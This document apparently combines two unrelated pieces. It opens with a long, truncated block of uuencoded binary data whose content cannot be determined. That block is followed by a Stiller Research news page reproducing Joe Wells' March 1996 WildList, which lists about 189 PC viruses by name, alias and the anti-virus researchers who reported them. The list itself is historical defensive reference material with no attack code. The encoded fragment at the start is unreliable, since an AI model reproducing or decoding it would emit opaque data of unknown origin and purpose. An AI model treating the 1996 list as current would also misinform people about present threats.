MH*4LM1MC27=]<^`+"%]'K73%V#O9B@:J@SDI&A`&-7N6$!1KMS@F/AJG&+PA MVX@S]#H=8W5$Y^F#S/PIM(8AS]W]F6QNPQ_I)YOO?#W]R?A(/1F$I$N&.5D[ MPT7!O!EC*SG&J6#`XK"\DA5=IRU,.+>>_W/)Q-GF3@W65=B;]?H'93^CM>=C M';JKT#]4\NIP/0,WQ0]>A^TK[`C#N`YUGJ&:[%WH$\FK@5/"@]H#?57@8>CM M!K]4<`5K"N/*"..6LCFRVC1T"H'LL,$U*'Y@WJHV;E_R(!6;[4(R]-9*/=JW)] M-.WI=HPSVB,JKSR(3D!D:X$IA6ZG#+#):4MHJ/0M!#2+@K03-942]QS.6U+5 MNN<7[;:0)05>,!9W+"IV>;4DKWIQ>:2& MB]+Z;!B*SAT$."\]2=2J"-!C@TAVXKEN;.B:?=*(5Y33E3$=)`'K"KV).7U: M8^B4`5I<'F2%>6]X$U5`M*+H.:KB<2]S,?A`OP*@A6-*::#YJH"<9S;N`AIA M!>*B$&<%X&L&&'P07@&XS`!C-*4K*\%N7JO=VEKM?F*M=HNUJNK$>YO2QX#. MQ.PVVLC3F=-;5QK.'#LV"4--0LGG,IC(^H@YZIDZ.VX082W6 MK:+&$,CM.Q-S$D1/:SFK1X.0X9)$G.$*0PYGP_"-<-3'N:=<1W)X<)SL?1Z, M($($LH!W9`A>P-";;X"DMU5\@J7:#1Q7Z\#CF.\FJKK5C"D,J[]:'UJ=$^BT MTB>K0W'&S4HC3=69)&Z],7V*]TM]K[<\GF1:4C9HHTS6(PV# M#^,)Q>8M4U5+22%.^,[%^QBA>H5=S:)UVM&5LAV\%]L%C7U7=LZ*MJ#*RO+F>&"BGNM9@C) MG^J$1O)V,M55IDXJLRQ+[21_#T\ROIM=V<%TI%^TF_WOV'9E$MRW-'>C/)\G M1""*2$5I/EA44;D=]/84G\TUO7P`ZM4.0+U/'(!ZE@'HGOH[3C_]WYQ^A*?_ M[NC34&<+PB(.`:5KY_^&_:]IV+9OB]&GPF:2K7^DNX.EN^_?&@TIM:EG06+M M4FKC^3>D-4_)6,<857WYT<_UM%^KI_U/U-.^J:>_`%!+`P04``(`"`#QJHT@ M:Z:,[&<$``!V"@``"@```$-/3$]24RY46%2M5DUOVT80O1/@?QCDDC:0Y;A) MVKI!#X:3`@9BNT@-^%#TL"*'XL;D+K&[%*7\^K[9)67*EF^1`!VTL_/YWILE M.OZYMZZ\5H6SIY>VL<[G6?K>U=I3*P>TT:[W-"A/G?6!2PJ6%/6>#0AYIL1;=%L"MVBSP[.S__L*2K0/"H&F_IP=C!$/R)_5>ES2S<[S1MD]WYM[8+XBW M!7\);+OK`R8N7VFW'3@667'N_$$=( M>6R2;AI:X>:J83&=+O.&#>EJ[W5TIARL>F?04UM5RSQ+,Z#"FH"VI&(JVS1V MT&8]IO"'C.?-#_KDV02$"Z1UV5C/3Q%2Q)Q^6X9M.+3^C.+HN/6[Y]:W'5IP MW/K]H?5?NN'/6TSFN/6'Y]8W/-`+UK\\M_Y';?@%ZU^/6U_XH]:_'UK?6=OX MR*6CUN>'UB,$7LK[+%G_N#E?`)DSV+$IW*X3-@\:A!6@^:!,J4"8R)H1NB>1 M$!4KX)27`KW[&H-49B)F21,EA=_@!M"\B/YFE)AX,,A=T-!%$*/8-W3IX!L, M5"(E5*'CTX&`,5%@'VIV+',9"8(_Z2>AE9?)1CY'3B:F!5VH!C6H*D`AYN[& M8>SSKR$?*T:&4@5XY\C;%@S5+?\\1OVB??!3'_>=BY,_3:,O;`LQ*J6^)'FZ M[:Q#:T,4&8@"ZG_IEAP7-1<=LU,H;36[=61G]GEQ+S\\Q*#LB#8G4E M-SS&@72Q*1\%:DF?K-0JIY!8154OX#G<)L@XSSIG5Y#*'?E^M6$74FU31!0W M<-,LTSJ:ZFDAC$D<%:T!-DBQAEX7MCC MB>_ISU=B)[G_"V$M[>#_HTZY-"X0@Y477/=.BA*SU%:)8ROI(N]+O8BH@KZ[ M';U[^Q;$B0[2BGK"@M:6NMHEKNTP@C;/(MG)%PT1:W,.J[D/'-HFFVGZPGNAK>!5M:&D[X;EZLJ@MZDIF%O(RXG M;X+.P;J'/.M-B:O76BJT54AZ('0`)-!\Z^OE#-[24_8AMFH^=REEOR;2[,>F MCXO=$U`7=O(T`,;QNIC0@`XV?8FJ(J1EXZ*]@]/P#-WAK4[1GC@_$:@7=9ZU M>EV':8SN.+H\VPO(`0#F&SSM]!VD`\H3M:/4 M7CR`79$UV.XRRA$UKU$C:I::HE:E\<57QO)[E=8'+I,14K M>PR"$?GT#JMBK0E[S,'$B(? M$B)7(9D"E00;/$`@5R'+Z2*IV:S]!(-N(H':)P2#;"*!V"<$@R(C@=XG!(,@ M(X'<)P2#4B*!UB<$@U`B@=0G!(.F(H'2)P2#I"*!T"?8FG4@!(%2(@2K'%`B MFO`@!(&F(@2K'*0B!*L<0""LY9TB(YOZ)IPB(RP]W@RB'"@C9U8G#"$4(2/1 MAMDD/>0D+R0BY"0L)"+D)#[58VDB";)B*I-"TDH\#=(N\$R"(BW=U\/279 M#-T,UB>BWFE6(#V6;)LA(N\#+#V#M"*I++HBRF(@!STB&>!7 M(**,,!R0B(-TD!222(LK_(I9BFP(BF`$DOMT\TB>2(,KI(I9B M>[[=/-(GY"0K(UW*YB*#M"*I++HB<\K$(JGJHB:(W5X[P.:(V&H+"XD MF+PB[P.6'.\#HAPW)"-67>0D-R0CF(PG/"6IV*'E*\MKW"P]Q@,N(,0#$>*L MX@2H/%9("*BV2)6!)HM M(9LC(I@B(B#UOMT\VB>:+2&;(R*8(B,@];[=/-HGW.G'MY>@S=#-(GEF`1ZQ'P[P/AF_HFG"(CG0$D+"71AIN- M)IT+(Z/E`2>"*2,2)V7`V99BF_HFF`$DOMT\TB?AZ'#/2'SH<`]>N%^86UO;V-L9@QA;6\B9FUM;P)K:P(*00L"9E`, .:$U,1U$.`FQA=PPH+P8` ` end SR News: Viruses in the Wild SR News: Viruses in the wild The following list is maintained by Joe Wells of IBM anti-virus development. (Thank you, Joe!) Several companies including Stiller Research provide the reports that build this list. If you have had a virus incident please send us or one of the other companies listed below a note describing the virus and what product you used to identify it. ============================================================================ PC Viruses in the Wild - March 15, 1996 ============================================================================ This is a cooperative listing of viruses reported as being in the wild by 37 virus information professionals. The basis for these reports are virus incidents where a sample was received, and positively identified by the participant. Rumors and unverified reports have been excluded. This report is cumulative. That is, this is not just a report of which were seen last month. Monthly data is received from most participants, but the new data is added to the old. Participants are expected to let me know when I should remove their name from a virus that they haven't seen in a year and a half or so. The list should not be considered a list of "the most common viruses", however, since no specific provision is made for a commonness factor. This data indicates only "which" viruses are in the wild, but viruses reported by many (or most) participants are obviously widespread. The WildList is current being used as the basis for in-the-wild virus testing of antivirus products by Virus Bulletin and the NCSA (National Computer Security Association). Additionally, a virus collection based upon the WildList is being used in an effort to standardize the naming of common viruses. The WildList - (c)1993-1996 by Joe Wells - wildlist@vcnet.com ============================================================================ The section below gives the names of participants, along with their geographic region, organization, and antivirus product (if any). The locations with an asterisk (*) note that the reports are regional, all others being multinational or global. Key Participant * Region Organization Product ============================================================================ Ac Alan Candy * New Zealand Applied Insight F-Prot Pro Ad Allan Dyer * Hong Kong Yui Kee Co. Ltd. F-Prot Ae Amir Elbaz Israel EliaShim ViruSafe Cj Craig Jackson USA Datawatch VirexPC Cs Christian Schmid * Austria DataPROT Linz F-Prot Dc Dave Chess USA IBM IBM AntiVirus Dg Dmitry Gryaznov UK S&S Int'l Dr. Solomon's Ek Eugene Kaspersky * Russia KAMI AVP Ev Eduardo Velasquez * Colombia/Vene. SOFTEAM Ltda VirusCOP Ew Eddy Willems * Belgium/Lux. De Vaderlandsche None Fl Ferenc Leitold * Hungary Hunix Ltd. Virus Buster Fs Fridrik Skulason Iceland Frisk Int'l F-Prot Gm Gerard Mannig * France RECIF None Gp Gabriel Pislaru * Romania SoftWin AVX Iw Ian Whalley UK Virus Bulletin None Jd Joost de Raeymaeker * Portugal RSVP Dr. Solomon's Jk Jimmy Kuo USA McAfee ViruScan Ks Klas Scholdstrom * Sweden QA Informatik Dr. Solomon's Ls Luca Sambucci * Italy I.C.A.R.O. None Mh Mikko Hypponen * Finland Data Fellows F-Prot Pro Ms Marek Sell * Poland APEXIM MkS_vir Oh Omar Herrera * Mexico Escuadron AV Aguila AV Pb Pavel Baudis * Czech Republic Alwil Software Avast! Pd Paul Ducklin UK Sophos Plc. Sweep Ra Ruben Arias * Argentina RALP Integ Master Rf Richard Foley * Ireland Reflex Magnetics TBAV Rk Richard Ku * Taiwan Trend Micro PC-cillin Rr Roger Riordan Australia CYBEC VET Rt Roger Thompson USA Thompson Network Doctor Rv Robert Vibert * Canada Sensible Security D. Solomon's Sc Shane Coursen USA Symantec NAV Sg Sarah Gordon USA Command Software NetProt Sm Seiji Murakami * Japan Jade Corp Scan Vakzin Td Toralv Dirro * Germany U of Hamburg None Ws Wolfgang Stiller USA Stiller Research Integ Master Yp Ywain Penberthy * So Africa CSIR Virus Lab VPS Yr Yuval Rakavi * Israel BRM Untouchable ============================================================================ The WildList ============================================================================ This main list includes viruses reported by multiple participants, which appear to be non-regional in nature. Technically, this first list is "the" WildList according to my original specification, which required viruses to be verified in the wild by a minimum of two participants. A supplemental list follows that contains viruses reported by single participants. If a virus listed has minor variants, but no specific variant letter is attached, the virus meant is the .A variant. Viruses marked with a plus sign (+) are new to the main list this month. CARO Name of Virus [ Alias(es) ] Reported by: ============================================================================ 15_Years................[Espejo, Esto...] AeDcDgEvJkRtScSg Accept.3773.............[...............] RaYr Aircop.Standard.........[...............] OhRk +Alfons.1344.............[...............] FsRr Anticad.4096.A..........[Plastique 5.12.] JkSg Anticad.4096.Mozart.....[Invader........] DgFsJkSg AntiCMOS.A..............[Lenart.........] AcAdCjDcDgEvEwFlFsGmIwJdJkKsMhMs (continued) PdRtRvScSgSmWsYpYr AntiCMOS.B..............[LiXi...........] AdMsScSmTdYr AntiEXE.A...............[D3, Newbug.....] AcAdCjDcDgEvEwFlFsGmGpIwJkKsMhMs (continued) PdRfRkRtRvScSgSmTdWsYr Arianna.3375............[...............] DcDgLs Avispa.D................[...............] AeJkRaRtSc BackFormat.A............[Backform.......] DgFlFsJkMhYr Baclab..................[NTU.T4, Crawber] RtSc Bad_Sectors.3428........[...............] FlGpYr Barrotes.1310.A.........[Barrotos.......] DgEvGmJdJkPdScYp Boot-437................[...............] AcCjDcDgFlFsGmJkKsMsOhPbPdRkRtSc (continued) SgSmWsYr BootEXE.451.............[BFD, BE-451....] FlFsIwJkMhMsSg Bosnia:TPE.1_4..........[TPE_Bos........] JkLs Brasil..................[...............] CjJkSc +Burglar.................[GranGrave.1150.] DgFsJkMh Bye.....................[ByeBye.........] DcKsPdTd Byway.A.................[Dir2.Byway, Hnd] DcDgEvIwJkScSg Byway.B.................[Dir2.Byway, Hnd] DcDgEv Cascade.1701.A..........[1701...........] CjCsDgFsGmGpJkKsMhPdRtSgSmWs Cascade.1704.A..........[1704...........] CsDgEkFsKsRtScSg Cascade.1704.D..........[Unk............] FsJk Chance.B................[Lennon.........] DcFsSc Changsha.A..............[Centry,.Changes] KsMsRrRt Chaos.1241..............[Faust..........] JkRrSgYr Chill...................[Chill Touch....] JkRtSc Chinese_Fish............[Fish Boot......] CjDgFsJkKsRkRrRtYr Civil_Defence.6672......[CDV 3.3........] DcPbSg Concept.................[WordMacro......] AcAdCsDgEwIwJdJkKsMhMsPdRfRkRrRv (continued) ScSgSmTdWsYp CPW.1527................[Mediera, Mierda] DgEvJkSc Crazy_Boot..............[...............] DcDgEwFlJkMhScSgSmTd DA_Boys.................[...............] CjEwJkRtScSgWs Dark_Avenger.1800.A.....[Eddie..........] CjDgFsGpIwRrSgWs Datalock.920.A..........[V920...........] DgYr DelWin.1759.............[Goblin.1759....] DcJkMsPdTd Den_Zuko.2.A............[Den Zuk........] DgRtSg Diablo_Boot.............[...............] DcEvMhPdRaSc Die_Hard................[DH2, Wix.......] DcDgFlFsJkKsMsRkRtScSgTdWsYpYr Dir_II.A................[Creeping Death.] CsDgEkFlFsGmGpJkKsOhRrScSgWsYpYr Disk_Killer.1_00........[Ogre...........] DgEkKs Disk_Washer.............[...............] ScSm DR&ET.1710..............[Dret...........] JkMs EXE_Bug.A...............[CMOS Killer....] DgFsGmJkKsOhPdRfRtScTdWsYp EXE_Bug.C...............[...............] RtYp EXE_Bug.Hooker..........[...............] RtYp Fairz...................[Khobar.........] JkMhMsRf Fat_Avenger.............[...............] DcRrSm Feint...................[Int7F-E9.......] DgFsPd Fichv.2_1...............[905, CHV 2.1...] DgFsGmJk Filler.A................[DiskFiller.....] CjKs Finnish.357.............[...............] FsKs Finnish_Sprayer.........[Aija...........] FsKsMhSc Flame...................[Stamford.......] JkRrScYr Flip.2153.A.............[Omicron........] DcDgFsGmJkKsSmYr Flip.2343...............[Omicron 2......] DgFsJd Form.A..................[Form 18........] AcCjCsDcDgEvEwFlFsGmGpIwJdJkKsLs (continued) MhPbPdRfRtScSgSmTdWsYpYr Form.C..................[...............] CsMs Form.D..................[Form May.......] CsDcEvFsGmMsPdRtScYr Frankenstein............[Frank, Sblank..] DgJkMs Freddy_Krueger..........[Freddy 2.......] FsJkScWsYr Frodo.Frodo.A...........[4096,.4K.......] DcDgEwFsGpJkKsRrYr Galicia.................[Telecom........] JkMhRtSc Ginger.2774.............[Gingerbread....] JkRrSc GoldBug.................[...............] DgFlJkMh Green_Caterpillar.1575..[Find,1575,1591.] CjDgFlFsGmGpIwJkLsOhRrRtScSmWs Helloween.1376.A........[1376...........] DcDgFlIwJkPbRrScWsYr Hi.460..................[Hi.............] GpJkMsYr Hidenowt................[...............] DgGmJkPdScSm HLLC.Even_Beeper.B......[...............] DgMsWs HLLO.Novademo...........[Nova...........] FsMs J&M.....................[Jimi, Jimmy....] DcFsIwJkKsMhMsPbPd Jerusalem.1244..........[1244...........] DgLsSg Jerusalem.1808.Standard.[1808, 1813.....] CjCsDcDgFsJkKsRkRtSgSmWsYpYr Jerusalem.Mummy.1364.A..[Mummy 2.1......] DgFsRtYp Jerusalem.Sunday.A......[Sunday.........] JkRkRtSgYp Jerusalem.Zero_Time.Aust[Slow...........] DgJdJkRrRtSm Jos.1000................[Jabb,Jabberwocy] GpMs Joshi.A.................[...............] CjDcDgFsJkKsRkRrRtScSgSmWsYr Jumper.A................[French Boot, 2k] CjDcDgEwFsGmGpPdRtScSgYr Jumper.B................[SillyBop, 2kb..] DgJkKsMhMsSgSm Junkie..................[...............] AcCsDcEwFlFsGmGpIwJkKsLsMhMsPdRf (continued) RrRtScSmTdWsYr Kampana.A...............[AntiTel,Campana] CjDcDgEwFsGmIwJdJkKsMhPbPdRfRtSc (continued) SgSmTd Kaos4.687...............[...............] FsJkMsScSgYp Keypress.1232.A.........[Turku, Twins...] DcDgGpRrRtSgYr Leandro.................[TimeWarp.......] AeDcEvGpIwJkMhPdRtScWs Lemming.2160............[...............] RrSc Liberty.2857.A..........[Mystic, Magic..] DcEvFsRtSmYr Little_Brother.307......[...............] FsJk Little_Red.1465.........[Red Book, Mao..] CjDcDgJkRtScSmTdWsYpYr MacGyver.2803...........[Shoo...........] AdGmJkMsRk Maltese_Amoeba..........[Amoeba.2367....] DgFsGmKsMsRtSgWsYpYr Mange_Tout.1099.........[1099...........] DgGmJkKsMsPbSc Manzon.1449.............[...............] DcEwIwJkMhMsRrTd Markt.1533..............[Werbe, Media...] DgJk MIREA.1788..............[Lyceum.1788....] AeEkJk +MISiS...................[Zharinov,NIKA..] EvYr Mongolian_Boot..........[Mongol.........] DgScSm Music_Bug...............[...............] CjFsJkWs Necros.1164.............[Gnose, Irish3..] DgRf Neuroquila..............[Havoc, Wedding.] DgJkWs Nightfall.4518.B........[N8Fall, Nightfa] DgJkPbTd NJH2LBC.A...............[Korea Boot.....] DgJkYr No_Frills.Dudley........[Oi Dudley......] DgJkRrRt No_Frills.No_Frills.843.[...............] JkRrSc Nomenklatura.A..........[Nomen..........] DgJkMh November_17th.800.A.....[Jan1, Int83.800] LsSc November_17th.855.A.....[Int83.855......] DgFsGmJkLsRtSc NPox.963.A..............[Evil Genius....] FsSc NYB.....................[B1.............] AdCjDcDgEkEwFsJkKsLsMhMsPdRtScSg (continued) SmTdWsYpYr One_Half.3544...........[Dis, Free Love.] AdAeCsDcDgEkEvEwFlFsGmGpJkKsLsMh (continued) MsPbRfRkRtScSgTdWsYpYr Ontario.1024............[SBC, 1024......] DcRr +Parity_Boot.A...........[...............] IwTd Parity_Boot.B...........[Generic 1......] CjCsDcDgEvEwFlFsGmGpJdJkKsMhPdRf (continued) RtScSgSmTdYp Pathogen:SMEG.0_1.......[SMEG...........] DgScWs Peter...................[Peter II.......] DcJdJkMhSmYp Ph33R.1332..............[...............] EwJk Phx.965.................[PUX.965........] MsRa Ping_Pong.B.............[Bouncing-Ball, ] DgGmGpYr Predator.2448...........[2448...........] FsJkKsScYr Print_Screen_Boot.A.....[India, PrnSn...] DgYr QRry....................[Query, Essex...] DcEvJkSc +Quandary................[Parity_Boot.Enc] DgTd Quicksilver.1376........[Quicky, V.1376.] DgFlGmJkPdScTdYr Quox.A..................[Stealth 2......] DcFlFsJkRtScSgSm Ripper..................[Jack Ripper....] AcAdCjCsDcDgEwFlFsGmGpIwJkKsMhMs (continued) PbPdRfRkRtRvScSgSmTdWsYp Russian_Flag............[Slydell, Ekater] DgJkScYpYr Sampo...................[Turbo, Wllop...] AcAdCjDcDgEwFsGmIwJkKsMhMsPbPdRt (continued) ScSgSmWsYp Sarampo.1371............[...............] DgJdJk Sat_Bug.Natas.4744......[Satan..........] AdDcDgEvEwFlFsJdJkKsMhMsOhPbPdRk (continued) RtScSgSmTdYp Sat_Bug.Sat_Bug.........[Satan Bug......] EvJkScYr Satria..................[July 4th.......] JkTd Sayha...................[...............] JkScYr Screaming_Fist.II.696...[Fist 2, Scream.] CjDgJkRtSg She_Has.................[Breasts........] DgIwPdTd Sibylle.................[...............] DcDgFl Sleep_Walker.1266.......[Swalker........] JkRrSc Stealth_Boot.B..........[AMSE, NopB.....] CjDcDgEvJkPdRtScSgSmYpYr Stealth_Boot.C..........[AMSE, NopB2....] CjEvGmJkPdRtScSgYr Stoned.16.A.............[Brunswick......] DcDgScYr Stoned.Angelina.A.......[...............] CsDcDgEvFlGmIwJdJkKsMhMsPbPdScSg (continued) SmTdYp Stoned.Azusa.A..........[Hong Kong......] CjCsDgFsJkKsRrRtScYpYr Stoned.Bravo............[...............] JkMsYp Stoned.Bunny.A..........[...............] ScSgWsYp Stoned.Daniela..........[...............] ScSg Stoned.Dinamo...........[...............] DcIwRtScYr Stoned.Empire.Int_10.B..[...............] JkRtScSg Stoned.Empire.Monkey.A..[Monkey.........] DcGmJkKsOhPdRrRtScSg Stoned.Empire.Monkey.B..[Monkey 2.......] CjDcDgEvEwFsGmIwJdJkKsMhOhPdRkRr (continued) RtRvScSgSmTdWsYp Stoned.June_4th.A.......[Bloody!........] CjCsDgJkKsRkRrScSmWsYr Stoned.Kiev.............[Epbr...........] CjEkJkPdRt Stoned.Lzr..............[Lisa2, Whit....] AdCjDcEvFsJkRtScYr Stoned.Manitoba.........[Stonehenge.....] DcDgFsJkKsRtSc Stoned.Michelangelo.A...[...............] AdCjCsDcDgEkFlFsGmGpJkKsOhPbPdRk (continued) RrRtScSgSmWsYpYr Stoned.No_INT.A.........[Stoned.........] CjCsDcDgEwFsGmIwJkKsMhOhPbPdRrRt (continued) ScSgWsYpYr Stoned.NOP..............[NOP............] DgJkWs Stoned.Standard.A.......[New Zealand....] CjDcDgEkEvFsGmGpJkKsLsPdRkRrRtSc (continued) SmWsYp Stoned.Swedish_Disaster.[...............] CjDgKs Stoned.W-Boot...........[Stoned.P, Wonka] AdDcEvJkMsRrScWsYr +SVC.2936.C..............[...............] EvJk SVC.3103.A..............[SVC 5.0........] DgEkSc Swiss_Boot..............[Swiss Army.....] DcFlFsJkSm Tai-Pan.438.............[Whisper........] DcDgFlFsGmJkKsMhMsPbPdRtSgTdWsYr Tai-Pan.666.............[D2D, Doom2Death] DcDgEkEwJkKsMhMsRtScSgSmWsYp Tequila.A...............[...............] CsDcDgEwFsGmGpJkPdRfRkRtScSgSmTd (continued) WsYpYr Three_Tunes.1784........[Flip, PCBB.1784] AeCjDcEvJkSc Trakia.653..............[...............] RrSc Tremor.4000.A...........[...............] CsFlFsJkKsMhMsPbRtSgWsYp Trojector.1463..........[Athens.........] DcDgFsJkSgSm Unashamed...............[...............] IwJdJkMhPdScYp Urkel...................[Nwait..........] CjDcFsJkScSgWs V-Sign..................[Cansu, Sigalit.] CjDcDgFsGmIwJkKsLsMhPbPdRrRtScSg (continued) SmWsYr Vacsina.TP-05.A.........[RCE-1206.......] CjDgFsRtSc Vacsina.TP-16.A.........[RCE-1339.......] DgFsSm Vampiro.................[...............] DgRaWs Vienna.648.Reboot.A.....[DOS-62.........] AeDgEkGpSg Vinchuca................[...............] DgRaWs Virogen.Pinworm.........[Pinworm........] CjJk VLamiX..................[Die Lamer......] DgJkMsRt WelcomB.................[Bupt.9146......] AdCsDcEvGmIwJkKsMhMsPbPdRtScYp WXYC....................[...............] CjJkMsOhScSmWs Xeram.1664..............[N-Xeram.1664...] JkPd Yankee Doodle.TP-39.....[RCE-2772.......] DgFs Yankee Doodle.TP-44.A...[RCE-2885.......] DgEkEwFsGmGpJkKsLsMhMsRtSgSmTd Yankee Doodle.XPEH.4928.[Micropox.......] FlFsJkYr _814....................[Unsnared, V.814] AeGp ============================================================================ Total for the WildList: 189 ============================================================================ Release Notes for the 10 March 1996 list: There will be a meeting of WildList participants at the NCSA Conference in Arlington, Virginia, USA, on Sunday, March 31st, at 13:00. Several WildList participants will be there (some are speaking). I have corrected Eduardo Velasquez's name, which I had as Eduardo Medina. Klas Scholdstrom has replaced Mikael Larsson at QA Informatik in Sweden. Dave Chess has replaced me at IBM since I am now a consultant to IBM and since he's actually been giving me the IBM reports all along. Four macro viruses (Nuclear.A, Nuclear.B, Concept.Fr (Word, French Ed.), and Concept.Imposter) have moved onto the supplemental list. I am continuously seeking WildList participants for regional reporting, especially in Central and South America, Spain, former Soviet republics, and the Far East. Such new participants will need to be in a position where they can monitor and verify virus incidents. People who develop av products are best suited. People who represent one or more av products (agents) and provide localized support may also be qualified if they actually verify the viruses or forward samples to developers. If you thus qualify, please send your name, location, organization, product name, favorite brand of beer, and references (preferably CARO members who know you). Send the information to wildlist@vcnet.com. Thanks. ============================================================================ The collation of this list is done by Joe Wells, Consultant to IBM's T.J.Watson Research Center, who is solely responsible for its contents. The latest WildList is always posted directly by me to the NCSA Security forum on Compuserve, in the Virus Info/Tools library. The official archive location for the WildList is ftp.ncsa.com in pub/virus/wildlist. A complete archive of WildLists is available at the Virus Bulletin web site (http://www.virusbtn.com/WildLists/index.html). The WildList is copyright material, but may be freely quoted or cited in part or in whole. No permission is needed to reprint the list. All mail in regard to the WildList should be sent to wildlist@vcnet.com. My former address, wildlist@aol.com, is no longer active. ============================================================================ WildList Vol.603 - (c)1993-1996 Joe Wells - 75511,635 - wildlist@vcnet.com ============================================================================